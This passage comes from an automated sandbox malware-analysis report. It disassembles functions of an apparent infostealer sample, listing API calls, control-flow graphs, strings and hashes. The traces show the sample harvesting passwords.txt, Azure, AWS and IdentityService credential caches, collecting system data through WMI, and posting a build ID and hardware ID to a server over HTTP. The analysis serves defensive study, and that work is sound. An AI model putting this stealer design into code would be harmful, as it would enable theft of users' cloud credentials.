                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07913F71E00219ABCF10FB65DD47ACC7775AF04748F51802AF915B7192DBB8AE898B8C
                                                                                                                                                                                                                            Function 00408533 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 231stringmemoryfileCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 00411C1F: GetSystemTime.KERNEL32(?,004366E2,?), ref: 00411C4E
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 004085D8
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040862D
                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00408634
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 004086D2
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?), ref: 004086EB
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 004086F5
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,0043719C), ref: 00408701
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 0040870B
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,004371A0), ref: 00408717
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?), ref: 00408724
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 0040872E
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,004371A4), ref: 0040873A
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?), ref: 00408747
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00408751
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,004371A8), ref: 0040875D
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?), ref: 0040876A
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00408774
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,004371AC), ref: 00408780
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,004371B0), ref: 0040878C
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 004087C5
                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00408812
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                                                                                            • String ID: passwords.txt
                                                                                                                                                                                                                            • API String ID: 1956182324-347816968
                                                                                                                                                                                                                            • Opcode ID: 27a51afabc24c2e1730f56ff00952360d44b75554297647121cc2a500c06b5d8
                                                                                                                                                                                                                            • Instruction ID: 74ea50bb4acefddd9f23d1abfd6bb78663670087d182b85c349bcd99e5a28896
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27a51afabc24c2e1730f56ff00952360d44b75554297647121cc2a500c06b5d8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5813B32900208BBCF15FBA1ED4A9DD7B76AF08306F105026F601B31B1DBBA5E559B99
                                                                                                                                                                                                                            Function 00404B2E Relevance: 35.4, APIs: 12, Strings: 8, Instructions: 378networkstringfileCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 2260 404b2e-404bf3 call 4104ee call 404ab6 call 4104bc * 5 InternetOpenA StrCmpCA 2275 404bf5 2260->2275 2276 404bfb-404c01 2260->2276 2275->2276 2277 405194-405236 InternetCloseHandle call 402920 * 8 call 41d05a 2276->2277 2278 404c07-404d91 call 411c1f call 41059c call 410562 call 402920 * 2 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 41059c call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 41059c call 410562 call 402920 * 2 InternetConnectA 2276->2278 2278->2277 2347 404d97-404dd1 HttpOpenRequestA 2278->2347 2348 404dd7-404ddd 2347->2348 2349 405188-40518e InternetCloseHandle 2347->2349 2350 404dfb-40511a call 4105de call 410562 call 402920 call 41059c call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 41059c call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 41059c call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 41059c call 410562 call 402920 call 4104bc call 41059c * 2 call 410562 call 402920 * 2 lstrlenA * 2 HttpSendRequestA 2348->2350 2351 404ddf-404df5 InternetSetOptionA 2348->2351 2349->2277 2454 40515c-405174 InternetReadFile 2350->2454 2351->2350 2455 405176-405183 InternetCloseHandle call 402920 2454->2455 2456 40511c-405124 2454->2456 2455->2349 2456->2455 2458 405126-405157 call 4105de call 410562 call 402920 2456->2458 2458->2454
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                            • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 00404BEB
                                                                                                                                                                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404D83
                                                                                                                                                                                                                            • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00404DC7
                                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404DF5
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,00436947,",build_id,004377BC,------,004377B0,",hwid,0043779C,------), ref: 004050EE
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 00405101
                                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,?,00000000), ref: 0040510F
                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00405177
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 0040518E
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 0040519A
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                                                                                                                            • String ID: "$"$------$------$------$build_id$hwid$zwA
                                                                                                                                                                                                                            • API String ID: 3006978581-2086870335
                                                                                                                                                                                                                            • Opcode ID: 39ee05ec24a1b7a2e2ef0f0556164a6fe9c2841affaa1a713c40df59af8ac870
                                                                                                                                                                                                                            • Instruction ID: 53fd68ce47623ecae43c8496bc80cdb8daf13b4ed4eb58a46398de8c539df4ef
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 39ee05ec24a1b7a2e2ef0f0556164a6fe9c2841affaa1a713c40df59af8ac870
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12028171D1512A9BCB20EB21CD46ADDB7B5FF04748F0190E6A54877152CAB87ECA8FC8
                                                                                                                                                                                                                            Function 00401666 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129memoryfileCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 2464 401666-40169e GetTempPathW 2465 4016a4-4016cb wsprintfW 2464->2465 2466 401809-40180b 2464->2466 2467 4016d0-4016f5 CreateFileW 2465->2467 2468 4017fa-401808 call 41d05a 2466->2468 2467->2466 2470 4016fb-40174e GetProcessHeap RtlAllocateHeap _time64 srand rand call 423c60 WriteFile 2467->2470 2470->2466 2474 401754-40175a 2470->2474 2474->2466 2475 401760-40179c call 423c60 CloseHandle CreateFileW 2474->2475 2475->2466 2478 40179e-4017b1 ReadFile 2475->2478 2478->2466 2479 4017b3-4017b9 2478->2479 2479->2466 2480 4017bb-4017f1 call 423c60 GetProcessHeap RtlFreeHeap CloseHandle 2479->2480 2480->2467 2483 4017f7-4017f9 2480->2483 2483->2468
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 00401696
                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 004016BC
                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004016E6
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00401705
                                                                                                                                                                                                                            • _time64.MSVCRT ref: 0040170E
                                                                                                                                                                                                                            • srand.MSVCRT ref: 00401715
                                                                                                                                                                                                                            • rand.MSVCRT ref: 0040171E
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 0040172E
                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00401763
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00401771
                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 004017BE
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000), ref: 004017CF
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 004017DB
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
                                                                                                                                                                                                                            • String ID: %s%s$delays.tmp
                                                                                                                                                                                                                            • API String ID: 1620473967-1413376734
                                                                                                                                                                                                                            • Opcode ID: f76aab6d78298610a3b7e28b579f52f37c4603c13cc720c1ac32be6eed9832ba
                                                                                                                                                                                                                            • Instruction ID: 05fc87705062c45bfe73a5c894f0b3df5a3edf33da4a3e3f9b5da5ca26733804
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f76aab6d78298610a3b7e28b579f52f37c4603c13cc720c1ac32be6eed9832ba
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2741D9B1D00218ABD7205F71AC4CF9F7B7DEB85715F1002BAF10AE10A1DA354A54CF28
                                                                                                                                                                                                                            Function 004117DC Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 143memorycomtimeCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 004117E3
                                                                                                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000,0000004C,00413F39,Install Date: ,004368B8,00000000,Windows: ,004368A8,Work Dir: In memory,00436890), ref: 004117F4
                                                                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411805
                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041181F
                                                                                                                                                                                                                            • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411855
                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004118B0
                                                                                                                                                                                                                              • Part of subcall function 0041172C: __EH_prolog3_catch.LIBCMT ref: 00411733
                                                                                                                                                                                                                              • Part of subcall function 0041172C: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,004118D6,?), ref: 00411756
                                                                                                                                                                                                                              • Part of subcall function 0041172C: SysAllocString.OLEAUT32(?), ref: 00411763
                                                                                                                                                                                                                              • Part of subcall function 0041172C: _wtoi64.MSVCRT ref: 00411796
                                                                                                                                                                                                                              • Part of subcall function 0041172C: SysFreeString.OLEAUT32(?), ref: 004117AF
                                                                                                                                                                                                                              • Part of subcall function 0041172C: SysFreeString.OLEAUT32(00000000), ref: 004117B6
                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 004118DF
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004118EB
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004118F2
                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00411931
                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 0041191E
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                                                                            • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                                                                                                                                                            • API String ID: 2280294774-461178377
                                                                                                                                                                                                                            • Opcode ID: 1ef878a160ac1b41e8f62bbabcbd42ce57b377d218792d6474371592b041e7d9
                                                                                                                                                                                                                            • Instruction ID: 53c85eede228d83e8f8b7915dab758499af21cc48905de34fd7a3047e6c0012c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ef878a160ac1b41e8f62bbabcbd42ce57b377d218792d6474371592b041e7d9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63415F71900209BBCB10DBD5DC89EEFBBBDEFC9B11F20411AF611A61A4D6789941CB38
                                                                                                                                                                                                                            Function 004164FF Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 114stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00416524
                                                                                                                                                                                                                              • Part of subcall function 00411D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DD2
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416543
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,\.azure\), ref: 00416560
                                                                                                                                                                                                                              • Part of subcall function 00416013: wsprintfA.USER32 ref: 0041605A
                                                                                                                                                                                                                              • Part of subcall function 00416013: FindFirstFileA.KERNEL32(?,?), ref: 00416071
                                                                                                                                                                                                                              • Part of subcall function 00416013: StrCmpCA.SHLWAPI(?,00436ABC), ref: 00416092
                                                                                                                                                                                                                              • Part of subcall function 00416013: StrCmpCA.SHLWAPI(?,00436AC0), ref: 004160AC
                                                                                                                                                                                                                              • Part of subcall function 00416013: wsprintfA.USER32 ref: 004160D3
                                                                                                                                                                                                                              • Part of subcall function 00416013: StrCmpCA.SHLWAPI(?,00436647), ref: 004160E7
                                                                                                                                                                                                                              • Part of subcall function 00416013: wsprintfA.USER32 ref: 00416104
                                                                                                                                                                                                                              • Part of subcall function 00416013: PathMatchSpecA.SHLWAPI(?,?), ref: 00416131
                                                                                                                                                                                                                              • Part of subcall function 00416013: lstrcatA.KERNEL32(?), ref: 00416167
                                                                                                                                                                                                                              • Part of subcall function 00416013: lstrcatA.KERNEL32(?,00436AD8), ref: 00416179
                                                                                                                                                                                                                              • Part of subcall function 00416013: lstrcatA.KERNEL32(?,?), ref: 0041618C
                                                                                                                                                                                                                              • Part of subcall function 00416013: lstrcatA.KERNEL32(?,00436ADC), ref: 0041619E
                                                                                                                                                                                                                              • Part of subcall function 00416013: lstrcatA.KERNEL32(?,?), ref: 004161B2
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00416598
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 004165BA
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,\.aws\), ref: 004165D7
                                                                                                                                                                                                                              • Part of subcall function 00416013: wsprintfA.USER32 ref: 0041611B
                                                                                                                                                                                                                              • Part of subcall function 00416013: CopyFileA.KERNEL32(?,?,00000001), ref: 0041626B
                                                                                                                                                                                                                              • Part of subcall function 00416013: DeleteFileA.KERNEL32(?), ref: 004162DF
                                                                                                                                                                                                                              • Part of subcall function 00416013: FindNextFileA.KERNEL32(?,?), ref: 00416341
                                                                                                                                                                                                                              • Part of subcall function 00416013: FindClose.KERNEL32(?), ref: 00416355
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 0041660C
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0041662E
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 0041664B
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00416680
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                                                                            • API String ID: 780282842-974132213
                                                                                                                                                                                                                            • Opcode ID: 0f8bb1a1cda5efe2ef2a13cb43bc274b5f52338409e8384a10e56f8f3184d20b
                                                                                                                                                                                                                            • Instruction ID: 3cefbc2560fae273e5afeb2847eac18d6cd6927558b4bb74fdd557bb6d377028
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f8bb1a1cda5efe2ef2a13cb43bc274b5f52338409e8384a10e56f8f3184d20b
